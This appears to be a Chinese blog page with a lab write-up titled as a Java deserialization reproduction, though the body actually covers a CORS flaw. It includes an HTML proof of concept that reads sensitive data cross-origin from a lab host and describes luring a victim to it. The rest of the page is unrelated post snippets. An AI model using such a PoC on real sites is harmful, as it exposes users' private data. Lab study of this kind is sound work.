当前位置：首页 > news >正文

secExample靶场之java反序列化漏洞复现

news 2026/2/9 5:15:34

我是使用kali虚拟机搭建的靶场，具体搭建步骤可以看我之前的博客内容。

访问靶机地址，打开java反序列化的

点进去后是如图的页面，随便输入一信息。

可以看到敏感信息直接显示在了页面上。

访问192.168.189.141:8080/cors1，可以看到敏感信息直接显示到了页面上。

抓包查看到有cors1漏洞

将以下代码保存为一个cors.html文件，诱惑受害者点击

<html><head><script type="text/javascript">// 当前窗口加载完毕,执行cors函数window.onload = function cors() {// 初始化一个xhttp变量var xhttp = new XMLHttpRequest();xhttp.onreadystatechange = function () {if (this.readyState == 4 && this.status == 200) {document.getElementById("demo").innerHTML = alert(this.responseText);}};xhttp.open("GET", "http://192.168.189.141:8080/cors1", true); // 只需要修改存在cors的url即可xhttp.withCredentials = false;xhttp.send();};</script></head>
<body><textarea id="demo"></textarea>
</body>
</html>

利用web服务器

将脚本放在web服务器上，将url发给受害者。但是没有受害者，我们自己模拟一下受害者访问url地址172.16.1.65/cors.html

secExample靶场之java反序列化漏洞复现

我是使用kali虚拟机搭建的靶场，具体搭建步骤可以看我之前的博客内容。访问靶机地址，打开java反序列化的点进去后是如图的页面，随便输入一信息。可以看到敏感信息直接显示在了页面上。访问192.168.189.141:8080/cors1，可以看到…...

编程日记 2024/8/2 7:47:53

解决升级Linux内核后，open files设置无效的问题。

问题过程操作系统是OpenEuler 20.03，内核由4.19.90-2112.8.0.0131.oe1.aarch64升级到kernel-4.19.90-2401.1.0.0233.oe1.aarch64后，重启系统后，重新开起来运行OceanBase就运行不起来了，提示open files must not be less than 20…...

编程日记 2024/8/2 7:46:52

关于防范勒索病毒Play新变种的风险提示

近日，工业信息化部网络安全威胁和漏洞信息共享平台监测发现针对 Linux的勒索病毒Play新变种，攻击对象主要为VMware ESXi 虚拟化环境，攻击目标包括制造、建筑业、IT、金融和房地产等行业。 Play勒索病毒又名 Balloonfly和PlayCrypt&#xff0…...

编程日记 2024/8/2 7:45:50

一款.NET开源、跨平台的DASH/HLS/MSS下载工具

前言今天大姚给大家分享一款.NET开源（MIT License）、免费、跨平台的DASH/HLS/MSS下载工具，并且支持点播和直播（DASH/HLS）的内容下载：N_m3u8DL-RE。网络流媒体传输协议介绍 DASH DASH是一种基于HTTP的…...

编程日记 2024/8/2 7:44:49

MATLAB学习日志DAY21

结构体（2） 如果将生成逗号分隔列表的表达式括在方括号中，MATLAB 会将该列表中的每一项都存储在数组中。示例中，MATLAB 创建一个数值行向量，该向量包含结构体数组 S 的每个元素的 score 字段： scores [S.…...

编程日记 2024/8/2 7:43:48

import lombok.extern.slf4j.Slf4j; import org.springframework.stereotype.Service;import java.io.IOException; import java.net.InetSocketAddress; import java.nio.ByteBuffer; import java.nio.channels.SocketChannel;/*** 请求tcp接口** author Mr丶s* date 2024/7/1…...

编程日记 2024/8/2 7:42:47

leetcode刷题日记-括号生成

题目描述题目解析回溯的题目，不过这个两个if我就感觉有点难以理解了，不过仔细的思考了一下，确实考虑到了每个位置的情况，特别是针对右边括号题目代码 class Solution:def generateParenthesis(self, n: int) -> List[str…...

编程日记 2024/8/2 7:41:46

小程序按钮分享

使用button设置： open-type"share"：来微信分享； html： <button open-type"share"></button>...

编程日记 2024/8/2 7:40:44

多模态多智能体，在实现系统2（深思熟虑）方面的探索

多模态和多智能体，在系统2（深思熟虑）方面的探索提出背景理性的定义为什么理性定义是四大基本原则，而不是其他数量，又为何是这四个，而不是其他？理性不等于推理通过多模态多智能体系统增强理性…...

编程日记 2024/8/2 7:39:43

【CAN通讯系列8】如何准确接收数据？

在【CAN通讯系列7】波特率是什么？已经介绍了CAN位时间和采样点等概念，每1位由同步段(SS)、传播时间段(PTS)、相位缓冲段1(PBS1)和相位缓冲段2(PBS2)四个段组成，这个也成为位时序，采样点位置处于PBS1和PBS2的交界处，如…...

编程日记 2024/8/2 7:38:42

RabbitMQ知识总结（基本概念）

文章收录在网站：http://hardyfish.top/ 文章收录在网站：http://hardyfish.top/ 文章收录在网站：http://hardyfish.top/ 文章收录在网站：http://hardyfish.top/ 基本概念 Producer： 消息的生产者，是一个向…...

编程日记 2024/8/2 7:35:39

Prel语言入门学习：一篇全面的指南

引言在编程语言的海洋中，Prel是一个较少人知的新星。作为一种专为数据处理和分析设计的语言，Prel结合了现代编程语言的简洁性与功能性，提供了一种独特的解决方案，尤其适用于数据科学家和分析师。本文将详细介绍Prel语言的基础&am…...

编程日记 2024/8/2 7:33:37

在云服务器上自动化部署项目，jenkins和gitee

▮全文概述在编写项目时，很头大的事情就是需要自己手动的上传jar包到服务器上启动。如果出现一点bug，就要重头上传和启动。这是一件很烦的事情，所以，可以使用jenkins和gitee实现项目的自动部署 ▮全流程在本地提交代码到gitee …...

编程日记 2024/8/2 7:32:36

python 参数输入

在 Python 中，参数输入通常有多种方式，这取决于你要从何处获取参数。以下是几种常见的方法： 1. 命令行参数使用 sys.argv 获取命令行参数，或者使用 argparse 模块进行更复杂的参数解析。示例 1: 使用 sys.argv import sys# …...

编程日记 2024/8/2 7:30:34

Spring面试篇章——Spring基本概述

Spring 的基本概述 Spring学习的核心内容—一图胜千言 IOC：控制反转，可以管理 Java 对象AOP：切面编程JDBCTemplate：是Spring提供一套访问数据库的技术，应用性强，相对好理解声明式事务：基于IOC …...

编程日记 2024/8/2 7:28:31

股票预测模型中注意力多层Attention RNN LSTM 的应用

全文链接：https://tecdat.cn/?p37152 原文出处：拓端数据部落公众号 Attention 机制是一种在神经网络处理序列数据时极为关键的技术，它赋予了模型“聚焦”能力，能够自动评估输入序列中各部分的重要性。通过为序列中的每个元素分…...

编程日记 2024/8/2 7:25:28

C语言 | Leetcode C语言题解之第313题超级丑数

题目： 题解： int nthSuperUglyNumber(int n, int* primes, int primesSize) {long dp[n 1];int pointers[primesSize];for (int i 0; i < primesSize; i) {pointers[i] 0;}long nums[primesSize];for (int i 0; i < primesSize; i) {nums[i] …...

编程日记 2024/8/2 7:23:26

PHP健身微信小程序系统源码

🏋️‍♀️健身新潮流！解锁“健身微信小程序”的全方位塑形秘籍 📱开篇：掌中健身房，随时随地动起来你还在为找不到合适的健身场地或教练而烦恼吗？是时候告别这些束缚，拥抱“健身微信小程序”…...

编程日记 2024/8/2 7:21:23

树组件 el-tree 数据回显

树组件 el-tree 数据回显树型结构的数据回显问题： 这里我只放了核心代码，主要是如何获取选中的树节点的id集合和如何根据树节点的id集合回显数据大家根据需要自行更改！ <el-tree ref"authorityRef" node-key"id" …...

编程日记 2024/8/2 7:19:20

54、PHP 实现希尔排序

题目： PHP 实现希尔排序描述： 思路分析：希尔排序是基于插入排序的，区别在于插入排序是相邻的一个个比较（类似于希尔中h1的情形），而希尔排序是距离h的比较和替换。希尔排序中一个常数因子n&a…...

编程日记 2024/8/2 7:17:18

测试微信模版消息推送

进入“开发接口管理”--“公众平台测试账号”，无需申请公众账号、可在测试账号中体验并测试微信公众平台所有高级接口。获取access_token: 自定义模版消息： 关注测试号：扫二维码关注测试号。发送模版消息： import requests da…...

编程新知 2026/2/8 4:37:13

日语AI面试高效通关秘籍：专业解读与青柚面试智能助攻

在如今就业市场竞争日益激烈的背景下，越来越多的求职者将目光投向了日本及中日双语岗位。但是，一场日语面试往往让许多人感到步履维艰。你是否也曾因为面试官抛出的“刁钻问题”而心生畏惧？面对生疏的日语交流环境，即便提前恶补了…...

编程新知 2026/2/8 4:37:01

CMake基础：构建流程详解

目录 1.CMake构建过程的基本流程 2.CMake构建的具体步骤 2.1.创建构建目录 2.2.使用 CMake 生成构建文件 2.3.编译和构建 2.4.清理构建文件 2.5.重新配置和构建 3.跨平台构建示例 4.工具链与交叉编译 5.CMake构建后的项目结构解析 5.1.CMake构建后的目录结构 5.2.构…...

编程新知 2026/2/2 7:39:34

高频面试之3Zookeeper

高频面试之3Zookeeper 文章目录高频面试之3Zookeeper3.1 常用命令3.2 选举机制3.3 Zookeeper符合法则中哪两个？3.4 Zookeeper脑裂3.5 Zookeeper用来干嘛了 3.1 常用命令 ls、get、create、delete、deleteall3.2 选举机制半数机制（过半机制&#xff0…...

编程新知 2026/1/25 13:13:20